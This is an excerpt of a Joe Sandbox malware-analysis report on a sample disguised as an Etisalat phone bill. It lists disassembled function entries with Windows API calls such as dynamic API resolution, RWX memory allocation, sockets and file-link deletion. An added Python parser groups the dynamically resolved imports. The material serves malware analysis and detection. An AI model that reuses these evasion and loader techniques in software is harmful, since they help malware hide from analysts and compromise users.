                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-1355242751
                                      • Opcode ID: 0187a9951358be34c923e8957b130b833a097e32a67e2f2eeed74a2c2a31ddb0
                                      • Instruction ID: 3b9b4d9258d8d66da938c84582024b93e3cf7569ba37d385e78aaa6e76f9a70f
                                      • Opcode Fuzzy Hash: 0187a9951358be34c923e8957b130b833a097e32a67e2f2eeed74a2c2a31ddb0
                                      • Instruction Fuzzy Hash: 74D01771950B13CFD7209F31D848B9676E4EF09355B11C87ED8C6EA160EBB4D880CA51
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00B64D2E,?,00B64F4F,?,00C262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B64D6F
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B64D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-3689287502
                                      • Opcode ID: 863cc048042126a28d187d9802ebc3ed2bed6c9f96a5c62399529421417c90d0
                                      • Instruction ID: 90a010c1714a69ea21730b0bbea0e3f7d850289b1387d1d6d0e65d7fe02de7d6
                                      • Opcode Fuzzy Hash: 863cc048042126a28d187d9802ebc3ed2bed6c9f96a5c62399529421417c90d0
                                      • Instruction Fuzzy Hash: 52D01730910B53CFD7209F35D84876676E8EF15392B11C97E9486EA2A0EB74D880CA51
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00BE12C1), ref: 00BE1080
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BE1092
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      • Opcode ID: 4bac9584df678c95e8fbf9e629fe4eff34af740f5fcf8cd18f9de4fe39e191fa
                                      • Instruction ID: 8721d3b37225aac7dbd8c5cd2fdc203362ff98f7b56df19ead453447c4d724e4
                                      • Opcode Fuzzy Hash: 4bac9584df678c95e8fbf9e629fe4eff34af740f5fcf8cd18f9de4fe39e191fa
                                      • Instruction Fuzzy Hash: 2BD01230510753CFD7205F35D85866676E4EF45351B11CC7DA485DA150DBB0C8C0CA51
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00BD9009,?,00BEF910), ref: 00BD9403
                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BD9415
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetModuleHandleExW$kernel32.dll
                                      • API String ID: 2574300362-199464113
                                      • Opcode ID: c5da1789a45df22e9cbb72d98832bb8a74ca917a4e9b8f5ec61b675d5eb9487f
                                      • Instruction ID: e18b5d336745b5c583eecaad3dabc357897e549138ea94deb5b6088e30d95a75
                                      • Opcode Fuzzy Hash: c5da1789a45df22e9cbb72d98832bb8a74ca917a4e9b8f5ec61b675d5eb9487f
                                      • Instruction Fuzzy Hash: 35D01734610757CFD7209F31D949657B6E5EF05351B11C87EA486EA661EB70C880CB51
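The five preceding entries share one shape: LoadLibraryA on kernel32.dll or advapi32.dll, then GetProcAddress with a literal export name (GetNativeSystemInfo, Wow64RevertWow64FsRedirection, Wow64DisableWow64FsRedirection, RegDeleteKeyExW, GetModuleHandleExW). APIs resolved this way never appear in the PE import table, and the listing shows only 00000000 as the GetProcAddress module handle, so the library has to be recovered from the LoadLibraryA call in the same function. The >>>AUTOIT NO CMDEXECUTE<<< argument on the Wow64DisableWow64FsRedirection entry is consistent with the "compiled AutoIt script" verdict in the report header: this resolution is done by the interpreter stub for its own compatibility shims, so these names fingerprint the AutoIt runtime rather than the embedded script. The Python below is an added example, not part of the Joe Sandbox report; it parses call lines in the format used on this page (copied into a constructed SAMPLE_REPORT) and pairs each GetProcAddress with the LoadLibraryA of its function entry to produce a per-library list of dynamically resolved APIs.

```python
"""Recover run-time resolved APIs from the "APIs" lines of a Joe Sandbox
function listing (LoadLibraryA + GetProcAddress pairs per function entry).

Added example, not part of the Joe Sandbox report. SAMPLE_REPORT is
constructed from call lines visible in the listing; the bullet, the
"ref:" suffix and the "Part of subcall function" prefix follow that format."""
import re
from collections import defaultdict

SAMPLE_REPORT = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00B64C2E), ref: 00B64CA3
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B64CB5
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00B64CE1,?), ref: 00B64DA2
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B64DB4
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00B64D2E,?,00B64F4F,?,00C262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B64D6F
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B64D81
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00BE12C1), ref: 00BE1080
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BE1092
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,00BD9009,?,00BEF910), ref: 00BD9403
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BD9415
APIs
  • Part of subcall function 00B648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B648A1,?,?,00B637C0,?), ref: 00B648CE
• CoInitialize.OLE32(00000000), ref: 00BCBC26
• CoCreateInstance.OLE32(00BF2D6C,00000000,00000001,00BF2BDC,?), ref: 00BCBC3F
• CoUninitialize.OLE32 ref: 00BCBC5C
"""

# One call line. The argument list is optional (CoUninitialize.OLE32 has none).
CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+: )?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_calls(text):
    """Return every call line as a dict: function-entry index (counted from
    each "APIs" header), API name, module, argument list and code reference."""
    calls, block = [], -1
    for line in text.splitlines():
        if line.strip() == "APIs":
            block += 1  # a new function entry begins
            continue
        m = CALL_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "block": block,
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args is not None else [],
            "ref": m.group("ref").upper(),
        })
    return calls


def dynamic_imports(text):
    """Pair each GetProcAddress with the LoadLibraryA of the same function
    entry. The listing prints 00000000 for the module handle (it is only
    known at run time), so the library name comes from LoadLibraryA's first
    argument; entries with no LoadLibraryA get '?'."""
    pairs, lib_for_block = [], {}
    for c in parse_api_calls(text):
        if c["api"] == "LoadLibraryA" and c["args"]:
            lib_for_block[c["block"]] = c["args"][0].lower()
        elif c["api"] == "GetProcAddress" and len(c["args"]) >= 2:
            pairs.append((lib_for_block.get(c["block"], "?"), c["args"][1], c["ref"]))
    return pairs


def group_by_library(pairs):
    """Map library name -> sorted, de-duplicated list of resolved exports."""
    grouped = defaultdict(set)
    for lib, name, _ref in pairs:
        grouped[lib].add(name)
    return {lib: sorted(names) for lib, names in grouped.items()}


if __name__ == "__main__":
    for lib, names in group_by_library(dynamic_imports(SAMPLE_REPORT)).items():
        print(f"{lib}: {', '.join(names)}")
```

Run against a full report export, the grouped output is a quick way to see which exports a sample hides from static import analysis; for this sample the set is small and matches what an AutoIt stub needs to run on older Windows, which is a reason to focus on the injected payload rather than on these entries.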
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LocalTime__swprintf
                                      • String ID: %.3d$WIN_XPe
                                      • API String ID: 2070861257-2409531811
                                      • Opcode ID: fa963b8814837d94c982e96f257750c2a84348094ef2907e83b0b6cf78b22d6d
                                      • Instruction ID: 7d9c1ec5fbc7480cd5421a413fb2231ebd900380e9c148c3fc1983f1ea69b679
                                      • Opcode Fuzzy Hash: fa963b8814837d94c982e96f257750c2a84348094ef2907e83b0b6cf78b22d6d
                                      • Instruction Fuzzy Hash: 19D012B180C118EACB84AA94DCC48F977FCA705701F9409D2F502D2000F3349B94EB31
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 56c026bb6ee8419a80c6f15181e3c9ca793598193cb1f411061cd17cf6e6fc5d
                                      • Instruction ID: a862e9e7885137549c96f142d8d00d74bdc14ff59ef41d9753f5d55bc26c64b1
                                      • Opcode Fuzzy Hash: 56c026bb6ee8419a80c6f15181e3c9ca793598193cb1f411061cd17cf6e6fc5d
                                      • Instruction Fuzzy Hash: 8AC13774A44216EFCB14CFA5C884AAEB7F5FF88710B1185D8E845EB251DB70EE81CB90
                                      APIs
                                      • CharLowerBuffW.USER32(?,?), ref: 00BDE3D2
                                      • CharLowerBuffW.USER32(?,?), ref: 00BDE415
                                        • Part of subcall function 00BDDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BDDAD9
                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00BDE615
                                      • _memmove.LIBCMT ref: 00BDE628
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                      • String ID:
                                      • API String ID: 3659485706-0
                                      • Opcode ID: b69c6551ee0636cb1fc04e39b57a28b43dab546fdad0bf2970274709f7bcc6de
                                      • Instruction ID: 258f9268aa7cc058f4f1464b8dcc0875c43587154ae9ca9c3745a8705f6dad3e
                                      • Opcode Fuzzy Hash: b69c6551ee0636cb1fc04e39b57a28b43dab546fdad0bf2970274709f7bcc6de
                                      • Instruction Fuzzy Hash: 71C14A716083019FC714EF28C49096ABBE4FF88758F1489AEF9999B351E731E905CF82
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00BD83D8
                                      • CoUninitialize.OLE32 ref: 00BD83E3
                                        • Part of subcall function 00BBDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BBDAC5
                                      • VariantInit.OLEAUT32(?), ref: 00BD83EE
                                      • VariantClear.OLEAUT32(?), ref: 00BD86BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                      • String ID:
                                      • API String ID: 780911581-0
                                      • Opcode ID: 6255d2abbc7265c6a6771cad88a64903e099060295c0a3834b9ce929c683a9b5
                                      • Instruction ID: e23225715cccbdff07f84b15b3719c2ab691375dfc08bb8b17bdd234affb4483
                                      • Opcode Fuzzy Hash: 6255d2abbc7265c6a6771cad88a64903e099060295c0a3834b9ce929c683a9b5
                                      • Instruction Fuzzy Hash: 4EA128752047019FDB10EF54C491B2AB7E4FF88324F188599FA9A9B3A1DB34ED04CB86
                                      APIs
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BF2C7C,?), ref: 00BB7C32
                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BF2C7C,?), ref: 00BB7C4A
                                      • CLSIDFromProgID.OLE32(?,?,00000000,00BEFB80,000000FF,?,00000000,00000800,00000000,?,00BF2C7C,?), ref: 00BB7C6F
                                      • _memcmp.LIBCMT ref: 00BB7C90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FromProg$FreeTask_memcmp
                                      • String ID:
                                      • API String ID: 314563124-0
                                      • Opcode ID: dd9d19795cb8ec18872d8b9834d6483396448de059a5a36150b11fecc220560c
                                      • Instruction ID: d0500c8202879d2aea7e32da28fa8a3dd52afef701fa1bee6dc2171872a823c6
                                      • Opcode Fuzzy Hash: dd9d19795cb8ec18872d8b9834d6483396448de059a5a36150b11fecc220560c
                                      • Instruction Fuzzy Hash: A481E871A00109EFCB14DF94C994EEEB7F9FF89315F204598E516AB260DB71AE06CB60
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: 7bda873d9f91f4dc2c60c90576ff8bb7bd8b8742d446eea16f380443fe867cad
                                      • Instruction ID: 3879c5e4440fb56a97a983d7a28e95b13a0b54970518a3602f15036dfa4ef41a
                                      • Opcode Fuzzy Hash: 7bda873d9f91f4dc2c60c90576ff8bb7bd8b8742d446eea16f380443fe867cad
                                      • Instruction Fuzzy Hash: 8151B6306543029BDB24AF65D891ABEB3E5EF48310F60889FF556CB691DEB49C40DB11
                                      APIs
                                        • Part of subcall function 00B65045: _fseek.LIBCMT ref: 00B6505D
                                        • Part of subcall function 00BC99BE: _wcscmp.LIBCMT ref: 00BC9AAE
                                        • Part of subcall function 00BC99BE: _wcscmp.LIBCMT ref: 00BC9AC1
                                      • _free.LIBCMT ref: 00BC992C
                                      • _free.LIBCMT ref: 00BC9933
                                      • _free.LIBCMT ref: 00BC999E
                                        • Part of subcall function 00B82F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00B89C64), ref: 00B82FA9
                                        • Part of subcall function 00B82F95: GetLastError.KERNEL32(00000000,?,00B89C64), ref: 00B82FBB
                                      • _free.LIBCMT ref: 00BC99A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                      • String ID:
                                      • API String ID: 1552873950-0
                                      • Opcode ID: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
                                      • Instruction ID: 27424d84e0cd1cfb317f8eff81ea24848b1ae09b5b51255ce9b84df798434b93
                                      • Opcode Fuzzy Hash: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
                                      • Instruction Fuzzy Hash: FC514AB1904218AFDF249F64CC85B9EBBB9EF48310F1004EEB609A7251DB755A90CF58
                                      APIs
                                      • GetWindowRect.USER32(0164E7E8,?), ref: 00BE9AD2
                                      • ScreenToClient.USER32(00000002,00000002), ref: 00BE9B05
                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00BE9B72
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: c744642cfcba27be49605e51bc159a038af0fbad7e0c73e1a24aa3bc5821d12d
                                      • Instruction ID: ea03ba7f685299fce8936de5e6008e388d8ba4467c25f322ba335834a0e174ca
                                      • Opcode Fuzzy Hash: c744642cfcba27be49605e51bc159a038af0fbad7e0c73e1a24aa3bc5821d12d
                                      • Instruction Fuzzy Hash: AC513F34A00289EFCF20DF69D880AAE7BF5FF54320F1482A9F8159B2A0D730AD45CB50
                                      APIs
                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00BD6CE4
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6CF4
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BD6D58
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6D64
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorLast$__itow__swprintfsocket
                                      • String ID:
                                      • API String ID: 2214342067-0
                                      • Opcode ID: 3b670288df27b654d6e07cf07440b23f0667dd4b5989667be345af4003f02e34
                                      • Instruction ID: 8597e4997e84b45ff1938310cdb0b6d2840f4e2ed8d6e90bfe787f2cab2acb34
                                      • Opcode Fuzzy Hash: 3b670288df27b654d6e07cf07440b23f0667dd4b5989667be345af4003f02e34
                                      • Instruction Fuzzy Hash: BF41A674740200AFEB10AF24DC86F3A77E9EB04B10F4481A9FA599F3D2DB759D008791
                                      APIs
                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00BEF910), ref: 00BD67BA
                                      • _strlen.LIBCMT ref: 00BD67EC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID:
                                      • API String ID: 4218353326-0
                                      • Opcode ID: 17c9f8b741ac2f92567888c4feeed9efeba19c7059e46df228d154bf3672d008
                                      • Instruction ID: 5a4009bc940e5919d6fb9223b53207c1dabd50fbbf8ba5e9ca471c3c7986ce7f
                                      • Opcode Fuzzy Hash: 17c9f8b741ac2f92567888c4feeed9efeba19c7059e46df228d154bf3672d008
                                      • Instruction Fuzzy Hash: 2B417F31A00105ABCB14EBA4DCD5EAEB7E9EF48310F1481E6F91A9B392EB74AD04D750
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BCBB09
                                      • GetLastError.KERNEL32(?,00000000), ref: 00BCBB2F
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BCBB54
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BCBB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: 68e386ed7d7b8ece7e7e6d554181288b5ccf302fd692e22200039bf59cd84aa8
                                      • Instruction ID: 9dc9c6f4d86dfaa51aa97847efe63ab8b6e0d39e0e4043f7fc179821a51bc1e1
                                      • Opcode Fuzzy Hash: 68e386ed7d7b8ece7e7e6d554181288b5ccf302fd692e22200039bf59cd84aa8
                                      • Instruction Fuzzy Hash: A64102396006519FCB10EF15C585E5DBBE5EF89320B0984D8F94A9B3A2CB38FD01CB91
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BE8B4D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
